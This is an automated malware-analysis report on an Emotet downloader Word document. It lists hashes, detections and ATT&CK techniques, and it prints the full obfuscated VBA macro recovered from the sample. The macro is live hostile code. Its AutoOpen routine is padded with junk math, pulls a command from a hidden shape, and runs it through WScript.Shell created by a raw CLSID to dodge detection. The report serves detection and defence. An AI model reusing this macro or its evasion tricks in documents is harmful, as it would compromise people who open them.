Emotet Office (OLE) malware analysis — malicious · 4d75f0744d8754f7

MALICIOUS

Office (OLE)

82.4 KB Created: 2018-11-27 10:04:00 Authoring application: Microsoft Office Word First seen: 2019-05-10

MD5: 8db608522f75499b3538be7b3711d0b4 SHA-1: 964c29e0cf70cbd275945c25e4f2b687c076c5d0 SHA-256: 4d75f0744d8754f79e2dcfd1423b567ced8d5a6d201fc73a1a2f0e7b806cb134

252 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.003 Windows Command Shell T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros that attempt to execute a command-line payload using WScript.Shell. The obfuscated command line indicates an attempt to download and execute a second-stage payload from a remote source. The ClamAV detection and heuristic firings strongly suggest this is an Emotet downloader.

Heuristics 9

ClamAV: Doc.Downloader.Emotet-6826428-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6826428-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUS

VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
Matched line in script
```
End Select
Set CKLZrpfQH = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + UfEKISu)
   On Error Resume Next
```

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

End Select
Set CKLZrpfQH = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + UfEKISu)
   On Error Resume Next

AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro

Matched line in script

Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next

Suspicious cmd.exe invocation with execution flag high SC_STR_CMD

Suspicious cmd.exe invocation with execution flag
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7101 bytes
SHA-256: `6d0928e18f206fbcf2557097bb69536455f47f03a65964514d34361a2b4d9ba9`
Detection ClamAV: No threats found Obfuscation or payload: likely 81 of 140 identifiers look randomly generated (e.g. 'QkzddrZwF') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "LFvMOUDH" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next For Each GNqOahcJj In QnSAShnN VUEtj = 324186903 + Oct(267790199) - 35962565 - CBool(301893 / 19523015) * 248041449 + Log(RWajfaNf - CLng(182456325)) - 12662481 + Hex(rOozwzm) Next Select Case CoThbCUK Case 111333709 bcGvCwRr = Cos(134405757) GZhjTsMi = 293750196 Case 1430403 GNViszowd = Sqr(77006094 / CSng(107780915 - Cos(320175595 - 301140370) + ZUwMp + Rnd(206111826 - 47077578))) zacGnNj = Hex(pRQvVOlMJ) End Select On Error Resume Next For Each vXTHwPDo In JaaNokm riwJSjo = 12555619 + Oct(267648719) - 170155140 - CBool(211835533 / 292010420) * 270725767 + Log(QOUAiZRXX - CLng(262685727)) - 68929297 + Hex(UwiHsbFN) Next Select Case uPbcriF Case 62724399 WwoOJLsnG = Cos(82022272) TKJzjL = 290973433 Case 156704314 hEmbZWzt = Sqr(158633812 / CSng(252453285 - Cos(311504814 - 77665428) + hQOwGm + Rnd(119207337 - 96839430))) VtCCj = Hex(cwjmh) End Select On Error Resume Next For Each LRjFpwFB In QfNzc wsZnZHiCt = 313276589 + Oct(31268410) - 112388666 - CBool(52658254 / 255692241) * 206472109 + Log(UuMNdT - CLng(3874280)) - 121579296 + Hex(SRNpi) Next Select Case lYwnnbR Case 208843991 cPqKkhz = Cos(95028179) CLTmOUi = 289421116 Case 48464696 HqUMKVTs = Sqr(75251326 / CSng(339518029 - Cos(290901400 - 253639720) + OklOd + Rnd(278867350 - 220706598))) UDqnXGw = Hex(cJvUj) End Select On Error Resume Next For Each QkzddrZwF In YiznO AuDzJ = 230640565 + Oct(27007682) - 332786226 - CBool(128204748 / 8269376) * 170551415 + Log(aCNiDX - CLng(38054539)) - 39295480 + Hex(ziFcTajPc) Next Select Case ampfaFt Case 243486468 jBJcSLWD = Cos(267269743) iahIHAMzX = 275219642 Case 53818524 iqazakX = Sqr(256784057 / CSng(192752098 - Cos(63254733 - 251825007) + ZwpGnRz + Rnd(156090911 - 289622425))) zAtiiiO = Hex(WvZJS) End Select Set sqbqdoj = Shapes("GajSAfqNUN") On Error Resume Next For Each CiofPPSUm In JGUDHDNAk kjKrifwB = 243992962 + Oct(245555526) - 126559194 - CBool(292664415 / 15402262) * 183984654 + Log(lWvGw - CLng(193703658)) - 293188912 + Hex(LhzCn) Next Select Case ZpEHNFSYz Case 5545639 TRjBWRDs = Cos(335245964) hStmGsc = 334795808 Case 61929764 cIGLvOl = Sqr(271105995 / CSng(148033157 - Cos(252211903 - 85597194) + uWiMJGo + Rnd(109670263 - 316071143))) oYsXKU = Hex(NqZnW) End Select NbihT = "" + WKsiSTi + XFHjO + IHXXH + DQiJwn + sqbqdoj.TextFrame.TextRange.Text + OUBlAj + ocPkznN + UPvopqc On Error Resume Next For Each wmmnLzJV In oMJho fQiKTQCAn = 341327456 + Oct(8727488) - 210290617 - CBool(163267626 / 129061935) * 163843413 + Log(dEzdlDwO - CLng(197884473)) - 107861224 + Hex(KoIsvX) Next Select Case jjwPzPvmz Case 260083087 TkCjD = Cos(232203053) hKMbU = 136995925 Case 212881204 FsMfH = Sqr(41335030 / CSng(55293398 - Cos(185726603 - 237289855) + oOEjizDI + Rnd(24149154 - 71608706))) IakYnNNk = Hex(PbiwJ) End Select Set CKLZrpfQH = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + UfEKISu) On Error Resume Next For Each pTCqrX In noiRVzGmG hiKUs = 151849952 + Oct(15692355) - 116185978 - CBool(233991464 / 95501929) * 302867079 + Log(VRokHAM - CLng(124334041)) - 90093407 + Hex(rnjvUssZF) Next Select Case sLdjEwzwA Case 160441572 IDNSR = Cos(189508338) rGZnolmX = 242519610 Case 321484578 JZJIv = Sqr(222087830 / CSng(68193071 - Cos(263987552 - 52286744) + LDPSpnjk + Rnd(144653736 - 191075549))) QHizY = Hex(WruhL) End Select Const zYXRLdMGf = 0 On Error Resume Next For Each jvzjWqmDU In HGfApsJI LYzYwP = 165597555 + Oct(86376666) - 52254248 - CBool(284224542 / 114594614) * 14719510 + Log(DEVZiJS - CLng(296350119)) - 275387566 + Hex(AtnvWvYs) Next Select Case lXjXhW Case 336350581 zdiMCi = Cos(246818269) biPNz = 273116834 Case 177178822 mwfKUCR = Sqr(232687051 / CSng(330933894 - Cos(26202110 - 108348466) + TjnDfsUPL + Rnd(172752940 - 327989873))) CruQIf = Hex(wwNljr) End Select On Error Resume Next For Each lEZibjU In LUvItldA AqLuGszB = 97801362 + Oct(294320289) - 132735290 - CBool(56373126 / 175826934) * 200941649 + Log(isQBVV - CLng(237657695)) - 68525647 + Hex(mswQqHi) Next Select Case zmvIwhi Case 76693316 hMoAikp = Cos(179947327) BUbiRQf = 233973021 Case 50058928 vjLHOp = Sqr(61363776 / CSng(262723382 - Cos(232460995 - 79161552) + LlqvoXWb + Rnd(56457889 - 50992434))) pQFJC = Hex(VicMZQ) End Select CKLZrpfQH.Run! NbihT, zYXRLdMGf On Error Resume Next For Each nNTFFJUOv In AfzCl BUkqI = 210955253 + Oct(32331301) - 28177547 - CBool(253145123 / 139736334) * 198952242 + Log(fwPZOWbnL - CLng(262133406)) - 251281561 + Hex(icjkibbY) Next Select Case vIzMzo Case 51291228 OSkfa = Cos(230715118) tbQaazsNi = 337726676 Case 73707196 zUZLuGaj = Sqr(264484148 / CSng(118606091 - Cos(85941343 - 115795379) + TiwUBFEt + Rnd(225117020 - 280668151))) KAzVC = Hex(PNmIIooHq) End Select On Error Resume Next For Each skTEaJbw In CVXjiBf EMLiKb = 83180924 + Oct(288302224) - 75934773 - CBool(315011749 / 260037369) * 130989071 + Log(mdVEZT - CLng(109486038)) - 146151880 + Hex(MwHrPb) Next Select Case HjzuRKOFF Case 223141062 GMPNn = Cos(191392768) QrCbE = 220335717 Case 99063698 tAMXTLkzE = Sqr(101687224 / CSng(262677007 - Cos(168655391 - 340282365) + PQwsKKJ + Rnd(316363973 - 335269185))) ihzkqf = Hex(SfbRNsi) End Select On Error Resume Next For Each clUEmKiJ In caNNiLPj AqRPBs = 27646222 + Oct(146528149) - 159393842 - CBool(177382718 / 131262164) * 196071723 + Log(phaBaTswq - CLng(215699555)) - 118474896 + Hex(ihrpjjKK) Next Select Case LzXMk Case 186684048 QmDpI = Cos(243030207) fmhkwrNK = 67042207 Case 341241116 SLMhrrJ = Sqr(123983316 / CSng(241574423 - Cos(193895227 - 224655750) + oqrsi + Rnd(26784235 - 194234344))) czvLCwz = Hex(TtBpXh) End Select End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.